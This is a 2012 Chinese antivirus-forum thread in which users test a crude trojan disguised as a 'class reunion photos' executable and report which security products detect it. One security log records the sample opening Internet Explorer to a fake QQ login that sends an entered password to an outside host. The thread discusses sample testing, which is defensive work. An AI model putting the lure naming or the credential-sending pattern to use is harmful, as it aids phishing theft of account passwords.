很土的样本，可是全过！

显示全部楼层 · 发表于 2012-8-10 00:44:27

本帖最后由清茗微漾于 2012-8-10 08:50 编辑

这种样本很俗气，可是为什么卡巴，诺顿就是不杀呢？反而360，金山都反应很及时！有些想换回国产的冲动！
另外：在线扫描结果！http://r.virscan.org/a08be1ce7b4dbd72dc40f32c784ca374

显示全部楼层 · 发表于 2012-8-10 09:04:31

本帖最后由 284678343 于 2012-8-10 09:07 编辑

To Kaspersky

卡巴斯基对于白+黑不敏感...

显示全部楼层 · 发表于 2012-8-10 09:09:38

显示全部楼层 · 发表于 2012-8-10 09:10:21

过比特梵德。电脑管家报毒。

显示全部楼层 · 发表于 2012-8-10 09:12:23

to mse

显示全部楼层 · 发表于 2012-8-10 09:13:49

大蜘蛛Clean，文件加了壳：
同学聚会的照片.exe - packed by ASPACK
同学聚会的照片.exe - packed by ASPACK
同学聚会的照片.exe - packed by ASPACK
已上报。

显示全部楼层 · 发表于 2012-8-10 09:26:56

本帖最后由 00000q 于 2012-8-10 09:42 编辑

运行360报

显示全部楼层 · 发表于 2012-8-10 09:29:47

弹框，输入密码，结果。

2012-08-10 09:27:31 运行应用程序操作:阻止并结束进程
进程路径:F:\virus\同学聚会的照片\同学聚会的照片\同学聚会的照片.exe
文件路径:C:\Program Files\Internet Explorer\IEXPLORE.EXE
命令行:http://xiaolioijnehwbdwed.7766.o ... password=2012-08-10

触发规则:应用程序规则->QQ假冒登录窗口->*->%ProgramFiles%\Internet Explorer\iexplore.exe

显示全部楼层 · 发表于 2012-8-10 09:30:12

Emsisoft Malware-Info
Name: Trojan.Crypt!E2

显示全部楼层 · 发表于 2012-8-10 09:35:17

红伞秒

[病毒样本] 很土的样本，可是全过！

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

评分

本帖子中包含更多资源